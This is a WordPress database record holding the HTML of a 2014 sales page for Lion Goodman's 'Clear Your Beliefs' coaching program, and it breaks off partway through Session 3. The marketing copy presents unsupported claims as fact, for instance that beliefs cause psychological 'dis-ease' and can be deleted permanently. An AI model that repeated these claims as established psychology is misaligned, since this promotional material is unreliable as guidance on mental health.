(1048, 2, '2014-06-19 02:05:18', '2014-06-19 07:05:18', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 